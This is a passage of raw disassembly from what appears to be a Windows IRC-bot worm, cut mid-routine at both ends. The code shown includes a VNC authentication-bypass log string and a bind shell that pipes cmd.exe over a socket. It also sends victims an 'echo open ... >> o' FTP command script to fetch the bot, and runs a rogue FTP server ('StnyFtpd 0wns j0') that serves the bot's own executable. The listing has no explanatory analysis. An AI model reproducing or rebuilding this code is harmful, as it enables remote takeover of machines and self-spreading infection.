mov edi, [ebp-8]
pop ecx
test edi, edi
mov esi, eax
jle short loc_40EE10
push edi
push esi
push ebx
call sub_40EBA5
add esp, 0Ch
loc_40EE10: ; CODE XREF: .text:0040EE03�j
and byte ptr [edi+esi], 0
lea eax, [ebp+0Ch]
push eax
push esi
push dword ptr [ebp-20h]
lea eax, [ebp-24Ch]
push dword ptr [ebp-28h]
push offset aVncD_DSSAuthby ; "VNC%d.%d %s: %s - [AuthBypass]"
push 200h
push eax
call sub_41C360
push 0
lea eax, [ebp-24Ch]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_409869
lea eax, [ebp-24Ch]
push eax
call sub_415D38
mov eax, [ebp+0B0h]
add esp, 34h
shl eax, 6
inc dword_431800[eax]
push ebx
lea eax, dword_431800[eax]
call ds:dword_427200 ; closesocket
push 1
pop eax
jmp short loc_40EE89
; ---------------------------------------------------------------------------
loc_40EE80: ; CODE XREF: .text:0040EC9D�j
; .text:0040ECC2�j ...
push ebx
call ds:dword_427200 ; closesocket
loc_40EE87: ; CODE XREF: .text:0040EC87�j
xor eax, eax
loc_40EE89: ; CODE XREF: .text:0040EE7E�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EE8E proc near ; DATA XREF: sub_40EF1C+15B�o
var_404 = byte ptr -404h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 404h
loc_40EE97: ; CODE XREF: sub_40EE8E+25�j
; sub_40EE8E+41�j
push 0
lea eax, [ebp+var_404]
push 400h
push eax
push dword_4CE708
call dword_4CB9EC ; recv
test eax, eax
jle short loc_40EE97
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
lea eax, [ebp+var_404]
push eax
push dword_4CE704
call ds:dword_4270F0 ; WriteFile
jmp short loc_40EE97
sub_40EE8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EED1 proc near ; DATA XREF: sub_40EF1C+142�o
var_404 = byte ptr -404h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 404h
loc_40EEDA: ; CODE XREF: sub_40EED1+2F�j
; sub_40EED1+49�j
lea eax, [ebp+var_4]
and [ebp+var_4], 0
push 0
push eax
lea eax, [ebp+var_404]
push 400h
push eax
push dword_4CE6F8
call ds:dword_4270EC ; ReadFile
cmp [ebp+var_4], 0
jle short loc_40EEDA
push 0
lea eax, [ebp+var_404]
push [ebp+var_4]
push eax
push dword_4CE708
call dword_4CBA24 ; send
jmp short loc_40EEDA
sub_40EED1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EF1C proc near ; DATA XREF: sub_401ACD+2CCA�o
var_11C = byte ptr -11Ch
var_98 = dword ptr -98h
var_7C = dword ptr -7Ch
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_38 = word ptr -38h
var_36 = word ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 28h
mov esi, eax
pop ecx
lea edi, [ebp+var_11C]
rep movsd
push 1
xor edi, edi
pop esi
mov [eax+98h], esi
push 10h
lea eax, [ebp+var_38]
push edi
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_38], 2
push [ebp+var_98]
call dword_4CB9D4 ; htons
push 6
push esi
push 2
mov [ebp+var_36], ax
call dword_4CBA54 ; socket
mov [ebp+arg_0], eax
lea eax, [ebp+var_38]
push 10h
push eax
push [ebp+arg_0]
call dword_4CBA00 ; bind
push 5
push [ebp+arg_0]
call dword_4CB9FC ; listen
mov ebx, ds:dword_427108
mov esi, ds:dword_427070
loc_40EF9C: ; CODE XREF: sub_40EF1C+1CB�j
push edi
push edi
push [ebp+arg_0]
call dword_4CBA68 ; accept
mov dword_4CE708, eax
lea eax, [ebp+var_C]
push edi
push eax
push offset dword_4CE704
push offset dword_4CE700
mov [ebp+var_C], 0Ch
mov [ebp+var_4], 1
mov [ebp+var_8], edi
call ebx ; CreatePipe
lea eax, [ebp+var_C]
push edi
push eax
push offset dword_4CE6FC
push offset dword_4CE6F8
call ebx ; CreatePipe
push 44h
lea eax, [ebp+var_7C]
push edi
push eax
call sub_41BF70
mov eax, dword_4CE700
add esp, 0Ch
mov [ebp+var_44], eax
mov eax, dword_4CE6FC
mov [ebp+var_40], eax
push edi
push 1
lea eax, [ebp+var_3C]
push 2
push eax
mov [ebp+var_7C], 44h
mov [ebp+var_50], 101h
mov [ebp+var_4C], di
call ds:dword_427104 ; GetCurrentProcess
push eax
push dword_4CE6FC
call ds:dword_427104 ; GetCurrentProcess
push eax
call ds:dword_427100 ; DuplicateHandle
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_7C]
push eax
push edi
push edi
push 4000090h
lea eax, [ebp+var_C]
push 1
push eax
lea eax, [ebp+var_C]
push eax
push offset aCmd_exe ; "cmd.exe"
push edi
call ds:dword_427074 ; CreateProcessA
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_40EED1
lea eax, [ebp+var_C]
push edi
push eax
call ds:dword_427084 ; CreateThread
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_40EE8E
lea eax, [ebp+var_C]
push edi
push eax
call ds:dword_427084 ; CreateThread
push 0FFFFFFFFh
mov [ebp+var_10], eax
push [ebp+var_28]
call ds:dword_4270A8 ; WaitForSingleObject
push edi
push [ebp+var_10]
call ds:dword_4270B4 ; TerminateThread
push edi
push [ebp+var_14]
call ds:dword_4270B4 ; TerminateThread
push [ebp+var_10]
call esi ; CloseHandle
push [ebp+var_14]
call esi ; CloseHandle
push edi
push [ebp+var_28]
call ds:dword_4270FC ; TerminateProcess
push dword_4CE700
call esi ; CloseHandle
push dword_4CE704
call esi ; CloseHandle
push dword_4CE6F8
call esi ; CloseHandle
push dword_4CE6FC
call esi ; CloseHandle
push [ebp+var_24]
call esi ; CloseHandle
push [ebp+var_28]
call esi ; CloseHandle
jmp loc_40EF9C
sub_40EF1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40F0EC proc near ; DATA XREF: .data:0042900C�o
jmp $+5
sub_40F0EC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F0F1 proc near
push 0FFFEh
push 400h
call sub_418BD1
pop ecx
mov dword_4CE710, eax
pop ecx
retn
sub_40F0F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F108 proc near ; DATA XREF: sub_40BD91+34D�o
var_6C0 = byte ptr -6C0h
var_2C0 = byte ptr -2C0h
var_C0 = byte ptr -0C0h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A4 = dword ptr -0A4h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 6C0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 27h
mov esi, eax
pop ecx
lea edi, [ebp+var_B0]
rep movsd
push 1
xor ebx, ebx
pop esi
mov [eax+98h], esi
push 10h
lea eax, [ebp+var_14]
push ebx
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_A4]
call dword_4CB9D4 ; htons
push ebx
push esi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], ebx
call dword_4CBA54 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jnz short loc_40F1AF
cmp [ebp+var_1C], ebx
jnz short loc_40F18F
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_20]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_B0]
call sub_409869
add esp, 14h
loc_40F18F: ; CODE XREF: sub_40F108+65�j
lea eax, [ebp+var_2C0]
push eax
call sub_415D38
push [ebp+var_AC]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_40F1AF: ; CODE XREF: sub_40F108+60�j
mov eax, [ebp+var_AC]
push 10h
imul eax, 234h
mov dword_43E91C[eax], edi
lea eax, [ebp+var_14]
push eax
push edi
call dword_4CBA00 ; bind
cmp eax, esi
mov ebx, 400h
jnz loc_40F2AA
call dword_4CB968 ; WSAGetLastError
cmp eax, 2740h
jz short loc_40F22F
xor esi, esi
cmp [ebp+var_1C], esi
jnz short loc_40F20F
push esi
lea eax, [ebp+var_2C0]
push [ebp+var_20]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_B0]
call sub_409869
add esp, 14h
loc_40F20F: ; CODE XREF: sub_40F108+E5�j
lea eax, [ebp+var_2C0]
push eax
call sub_415D38
push [ebp+var_AC]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_40F22F: ; CODE XREF: sub_40F108+DE�j
push 0FFFEh
push ebx
call sub_418BD1
pop ecx
mov dword_4CE710, eax
pop ecx
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
call dword_4CBA00 ; bind
cmp eax, esi
jnz short loc_40F2AA
call dword_4CB968 ; WSAGetLastError
xor esi, esi
cmp [ebp+var_1C], esi
jnz short loc_40F28A
cmp eax, 2740h
jz short loc_40F28A
push esi
lea eax, [ebp+var_2C0]
push [ebp+var_20]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_B0]
call sub_409869
add esp, 14h
loc_40F28A: ; CODE XREF: sub_40F108+159�j
; sub_40F108+160�j
lea eax, [ebp+var_2C0]
push eax
call sub_415D38
push [ebp+var_AC]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_40F2AA: ; CODE XREF: sub_40F108+CD�j
; sub_40F108+14C�j
push 5
push edi
call dword_4CB9FC ; listen
cmp eax, esi
jz loc_40F38F
mov [ebp+var_4], 10h
mov esi, offset aQunapfgq_exe ; "qunapfgq.exe"
loc_40F2C7: ; CODE XREF: sub_40F108+1D7�j
; sub_40F108+227�j ...
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_C0]
push eax
push edi
call dword_4CBA68 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40F2C7
cmp [ebp+var_1C], 0
jnz short loc_40F308
push 0
lea eax, [ebp+var_2C0]
push [ebp+var_20]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_B0]
call sub_409869
add esp, 14h
loc_40F308: ; CODE XREF: sub_40F108+1DD�j
lea eax, [ebp+var_2C0]
push eax
call sub_415D38
pop ecx
lea eax, [ebp+var_2C0]
push 0
push 200h
push eax
push [ebp+arg_0]
call dword_4CB9EC ; recv
cmp eax, 0FFFFFFFFh
jz short loc_40F2C7
push esi
push esi
push dword_4CB710
push [ebp+var_B0]
call sub_40AA06
pop ecx
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d >> o&echo user 1 >>o &e"...
lea eax, [ebp+var_6C0]
push ebx
push eax
call sub_41C360
add esp, 1Ch
lea eax, [ebp+var_6C0]
push 0
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_6C0]
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz loc_40F2C7
inc dword_4CE718
jmp loc_40F2C7
; ---------------------------------------------------------------------------
loc_40F38F: ; CODE XREF: sub_40F108+1AD�j
push edi
call dword_4CBA6C ; closesocket
push [ebp+var_AC]
call sub_40B6D6
pop ecx
push 0
call ds:dword_4270D4 ; ExitThread
sub_40F108 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3AA proc near ; DATA XREF: sub_40BD91+22A�o
var_A70 = byte ptr -0A70h
var_8E0 = byte ptr -8E0h
var_6E0 = dword ptr -6E0h
var_4C8 = byte ptr -4C8h
var_448 = dword ptr -448h
var_444 = dword ptr -444h
var_43C = dword ptr -43Ch
var_338 = byte ptr -338h
var_2D4 = byte ptr -2D4h
var_2A0 = byte ptr -2A0h
var_23C = byte ptr -23Ch
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_128 = byte ptr -128h
var_FC = byte ptr -0FCh
var_C8 = byte ptr -0C8h
var_B0 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = dword ptr -38h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A70h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 1
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp+var_6E0]
pop ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+var_A70]
xor esi, esi
push eax
push 101h
mov [ebp+var_28], ebx
mov [ebp+var_20], ebx
mov [ebp+var_18], ebx
mov [ebp+var_22C], esi
mov [ebp+var_43C], esi
call ds:dword_4271D8 ; WSAStartup
push esi
push ebx
push 2
call ds:dword_427204 ; socket
mov esi, ds:dword_4271DC
lea ecx, [ebp+var_28]
push 4
push ecx
mov edi, 0FFFFh
push 4
push edi
push eax
mov [ebp+var_8], eax
call esi ; setsockopt
lea eax, [ebp+var_20]
push 4
push eax
push 0FFFFFFFBh
push edi
mov edi, [ebp+var_8]
push edi
call esi ; setsockopt
lea eax, [ebp+var_18]
push eax
push 8004667Eh
push edi
call ds:dword_4271E0 ; ioctlsocket
mov ax, word ptr dword_4CB710
and [ebp+var_38], 0
push eax
mov [ebp+var_3C], 2
call dword_4CB9D4 ; htons
mov [ebp+var_3A], ax
lea eax, [ebp+var_3C]
push 10h
push eax
push edi
call ds:dword_4271E4 ; bind
test eax, eax
jge short loc_40F470
mov eax, ebx
jmp loc_40F9B8
; ---------------------------------------------------------------------------
loc_40F470: ; CODE XREF: sub_40F3AA+BD�j
push 0Ah
push edi
call ds:dword_4271E8 ; listen
mov [ebp+var_22C], ebx
mov ebx, ds:dword_427208
mov [ebp+var_228], edi
mov [ebp+var_4], edi
loc_40F48E: ; CODE XREF: sub_40F3AA+11D�j
; sub_40F3AA+606�j
push 41h
lea esi, [ebp+var_22C]
pop ecx
lea edi, [ebp+var_43C]
rep movsd
xor esi, esi
lea eax, [ebp+var_43C]
push esi
push esi
push esi
push eax
mov eax, [ebp+var_4]
inc eax
push eax
call ds:dword_42720C ; select
cmp eax, 0FFFFFFFFh
jz loc_40F9B5
xor edi, edi
cmp [ebp+var_4], esi
mov [ebp+arg_0], edi
jl short loc_40F48E
loc_40F4C9: ; CODE XREF: sub_40F3AA+600�j
xor esi, esi
push 64h
lea eax, [ebp+var_2A0]
push esi
push eax
call sub_41BF70
push 64h
lea eax, [ebp+var_B0]
push esi
push eax
call sub_41BF70
add esp, 18h
lea eax, [ebp+var_43C]
push eax
push edi
call sub_426350 ; __WSAFDIsSet
test eax, eax
jz loc_40F9A3
cmp edi, [ebp+var_8]
jnz short loc_40F580
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_23C]
push eax
push [ebp+var_8]
call ds:dword_4271EC ; accept
cmp eax, 0FFFFFFFFh
jz loc_40F9A3
xor ecx, ecx
cmp [ebp+var_22C], esi
jbe short loc_40F54A
lea edx, [ebp+var_228]
loc_40F53A: ; CODE XREF: sub_40F3AA+19E�j
cmp [edx], eax
jz short loc_40F54A
inc ecx
add edx, 4
cmp ecx, [ebp+var_22C]
jb short loc_40F53A
loc_40F54A: ; CODE XREF: sub_40F3AA+188�j
; sub_40F3AA+192�j
cmp ecx, [ebp+var_22C]
jnz short loc_40F568
cmp [ebp+var_22C], 40h
jnb short loc_40F568
mov [ebp+ecx*4+var_228], eax
inc [ebp+var_22C]
loc_40F568: ; CODE XREF: sub_40F3AA+1A6�j
; sub_40F3AA+1AF�j
cmp eax, [ebp+var_4]
jle short loc_40F570
mov [ebp+var_4], eax
loc_40F570: ; CODE XREF: sub_40F3AA+1C1�j
push esi
push 15h
push offset a220Stnyftpd0wn ; "220 StnyFtpd 0wns j0\n"
push eax
call ebx ; send
jmp loc_40F9A3
; ---------------------------------------------------------------------------
loc_40F580: ; CODE XREF: sub_40F3AA+15A�j
push esi
lea eax, [ebp+var_2A0]
push 64h
push eax
push edi
call ds:dword_4271FC ; recv
test eax, eax
jg short loc_40F5E7
mov edx, [ebp+var_22C]
xor ecx, ecx
cmp edx, esi
jbe short loc_40F5DB
lea eax, [ebp+var_228]
loc_40F5A7: ; CODE XREF: sub_40F3AA+207�j
cmp [eax], edi
jz short loc_40F5B5
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_40F5A7
jmp short loc_40F5DB
; ---------------------------------------------------------------------------
loc_40F5B5: ; CODE XREF: sub_40F3AA+1FF�j
dec edx
cmp ecx, edx
jnb short loc_40F5D5
lea eax, [ebp+ecx*4+var_228]
loc_40F5C1: ; CODE XREF: sub_40F3AA+229�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_22C]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_40F5C1
loc_40F5D5: ; CODE XREF: sub_40F3AA+20E�j
dec [ebp+var_22C]
loc_40F5DB: ; CODE XREF: sub_40F3AA+1F5�j
; sub_40F3AA+209�j
push edi
call ds:dword_427200 ; closesocket
jmp loc_40F9A3
; ---------------------------------------------------------------------------
loc_40F5E7: ; CODE XREF: sub_40F3AA+1E9�j
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2A0]
push offset aSS_3 ; "%s %s"
push eax
call sub_41CCE3
lea eax, [ebp+var_B0]
push offset aUser_1 ; "USER"
push eax
call sub_41CA50
add esp, 18h
test eax, eax
jnz short loc_40F62B
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_40F6AD
; ---------------------------------------------------------------------------
loc_40F62B: ; CODE XREF: sub_40F3AA+272�j
lea eax, [ebp+var_B0]
push offset aPass ; "PASS"
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40F64C
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp short loc_40F6AD
; ---------------------------------------------------------------------------
loc_40F64C: ; CODE XREF: sub_40F3AA+296�j
lea eax, [ebp+var_B0]
push offset aSyst ; "SYST"
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40F66D
push esi
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp short loc_40F6AD
; ---------------------------------------------------------------------------
loc_40F66D: ; CODE XREF: sub_40F3AA+2B7�j
lea eax, [ebp+var_B0]
push offset aRest ; "REST"
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40F68E
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp short loc_40F6AD
; ---------------------------------------------------------------------------
loc_40F68E: ; CODE XREF: sub_40F3AA+2D8�j
lea eax, [ebp+var_B0]
push offset off_43492C
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40F6B3
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
loc_40F6AD: ; CODE XREF: sub_40F3AA+27C�j
; sub_40F3AA+2A0�j ...
push edi
jmp loc_40F98C
; ---------------------------------------------------------------------------
loc_40F6B3: ; CODE XREF: sub_40F3AA+2F9�j
mov edi, offset aType ; "TYPE"
lea eax, [ebp+var_B0]
push edi
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40F6EF
lea eax, [ebp+var_338]
push offset aA_0 ; "A"
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40F6EF
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_40F989
; ---------------------------------------------------------------------------
loc_40F6EF: ; CODE XREF: sub_40F3AA+31F�j
; sub_40F3AA+336�j
lea eax, [ebp+var_B0]
push edi
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40F726
lea eax, [ebp+var_338]
push offset aI_0 ; "I"
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40F726
push esi
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_40F989
; ---------------------------------------------------------------------------
loc_40F726: ; CODE XREF: sub_40F3AA+356�j
; sub_40F3AA+36D�j
lea eax, [ebp+var_B0]
push offset aPasv ; "PASV"
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40F771
push 0Ah
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
pop ecx
lea edi, [ebp+var_128]
rep movsd
push eax
lea eax, [ebp+var_128]
push eax
movsw
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_128]
loc_40F764: ; CODE XREF: sub_40F3AA+406�j
push eax
push [ebp+arg_0]
call ebx ; send
xor esi, esi
jmp loc_40F98E
; ---------------------------------------------------------------------------
loc_40F771: ; CODE XREF: sub_40F3AA+391�j
lea eax, [ebp+var_B0]
push offset aList_0 ; "LIST"
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40F7B2
push 5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
pop ecx
lea edi, [ebp+var_C8]
rep movsd
movsw
push eax
lea eax, [ebp+var_C8]
push eax
movsb
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_C8]
jmp short loc_40F764
; ---------------------------------------------------------------------------
loc_40F7B2: ; CODE XREF: sub_40F3AA+3DC�j
lea eax, [ebp+var_B0]
push offset aPort ; "PORT"
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_40F883
lea eax, [ebp+var_2D4]
push eax
lea eax, [ebp+var_FC]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_2A0]
push offset aS_1 ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_41CCE3
lea eax, [ebp+var_FC]
push eax
call sub_41C159
mov edi, eax
lea eax, [ebp+var_2D4]
push eax
call sub_41C159
mov [ebp+var_C], eax
push 32h
lea eax, [ebp+var_FC]
push esi
push eax
call sub_41BF70
add esp, 34h
lea eax, [ebp+var_FC]
push [ebp+var_C]
push edi
push offset aXX ; "%x%x\n"
push eax
call sub_41C266
push 10h
lea eax, [ebp+var_FC]
push esi
push eax
call sub_41C7A5
add esp, 1Ch
mov [ebp+var_C], eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_4C]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_41C266
add esp, 18h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_40F989
; ---------------------------------------------------------------------------
loc_40F883: ; CODE XREF: sub_40F3AA+41D�j
lea eax, [ebp+var_B0]
push offset aRetr ; "RETR"
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_40F96A
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push [ebp+arg_0]
call ebx ; send
push [ebp+var_C]
lea eax, [ebp+var_4C]
push eax
call sub_40F9BF
pop ecx
cmp eax, 1
pop ecx
jnz loc_40F960
cmp [ebp+var_444], esi
jnz short loc_40F8ED
push esi
lea eax, [ebp+var_8E0]
push [ebp+var_448]
push eax
lea eax, [ebp+var_4C8]
push eax
push [ebp+var_6E0]
call sub_409869
add esp, 14h
loc_40F8ED: ; CODE XREF: sub_40F3AA+51E�j
call sub_40FA3C
cmp eax, 1
jnz loc_40F98E
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push [ebp+arg_0]
call ebx ; send
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_8E0]
push offset dword_434798
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_444], esi
jnz short loc_40F94B
push esi
lea eax, [ebp+var_8E0]
push [ebp+var_448]
push eax
lea eax, [ebp+var_4C8]
push eax
push [ebp+var_6E0]
call sub_409869
add esp, 14h
loc_40F94B: ; CODE XREF: sub_40F3AA+57C�j
lea eax, [ebp+var_8E0]
push eax
call sub_415D38
inc dword_4CE4E0
pop ecx
jmp short loc_40F98E
; ---------------------------------------------------------------------------
loc_40F960: ; CODE XREF: sub_40F3AA+512�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_40F989
; ---------------------------------------------------------------------------
loc_40F96A: ; CODE XREF: sub_40F3AA+4EE�j
lea eax, [ebp+var_B0]
push offset aQuit ; "QUIT"
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40F98E
push esi
push 1Bh
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
loc_40F989: ; CODE XREF: sub_40F3AA+340�j
; sub_40F3AA+377�j ...
push [ebp+arg_0]
loc_40F98C: ; CODE XREF: sub_40F3AA+304�j
call ebx ; send
loc_40F98E: ; CODE XREF: sub_40F3AA+3C2�j
; sub_40F3AA+54B�j ...
push 64h
lea eax, [ebp+var_2A0]
push esi
push eax
call sub_41BF70
mov edi, [ebp+arg_0]
add esp, 0Ch
loc_40F9A3: ; CODE XREF: sub_40F3AA+151�j
; sub_40F3AA+17A�j ...
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jle loc_40F4C9
jmp loc_40F48E
; ---------------------------------------------------------------------------
loc_40F9B5: ; CODE XREF: sub_40F3AA+10F�j
push 1
pop eax
loc_40F9B8: ; CODE XREF: sub_40F3AA+C1�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_40F3AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F9BF proc near ; CODE XREF: sub_40F3AA+508�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_4271D8 ; WSAStartup
push 0
push 1
push 2
call ds:dword_427204 ; socket
push [ebp+arg_0]
mov dword_4CE71C, eax
mov [ebp+var_10], 2
call ds:dword_4271F0 ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_4271F4 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push dword_4CE71C
call ds:dword_4271F8 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40FA37
push dword_4CE71C
call ds:dword_427200 ; closesocket
call ds:dword_4271D4 ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40FA37: ; CODE XREF: sub_40F9BF+60�j
push 1
pop eax
leave
retn
sub_40F9BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FA3C proc near ; CODE XREF: sub_40F3AA:loc_40F8ED�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
lea eax, [ebp+var_104]
push 104h
push eax
push 0
call ds:dword_427078 ; GetModuleFileNameA
lea eax, [ebp+var_104]
push offset dword_429068
push eax
call sub_41BEA2
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40FAD3
test byte ptr [esi+0Ch], 10h
jnz short loc_40FAB7
push edi
mov edi, 400h
loc_40FA7F: ; CODE XREF: sub_40FA3C+78�j
push esi
push 1
lea eax, [ebp+var_504]
push edi
push eax
call sub_41BAFA
add esp, 10h
lea eax, [ebp+var_504]
push 0
push edi
push eax
push dword_4CE71C
call ds:dword_427208 ; send
push 1
call ds:dword_427080 ; Sleep
test byte ptr [esi+0Ch], 10h
jz short loc_40FA7F
pop edi
loc_40FAB7: ; CODE XREF: sub_40FA3C+3B�j
push esi
call sub_41BA3B
pop ecx
push dword_4CE71C
call ds:dword_427200 ; closesocket
call ds:dword_4271D4 ; WSACleanup
push 1
pop eax
loc_40FAD3: ; CODE XREF: sub_40FA3C+35�j
pop esi
leave
retn
sub_40FA3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FAD6 proc near ; DATA XREF: sub_401ACD+2229�o
; sub_40BD91+475�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = byte ptr -6F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_23C = byte ptr -23Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_34 = byte ptr -34h
var_24 = word ptr -24h
var_22 = word ptr -22h
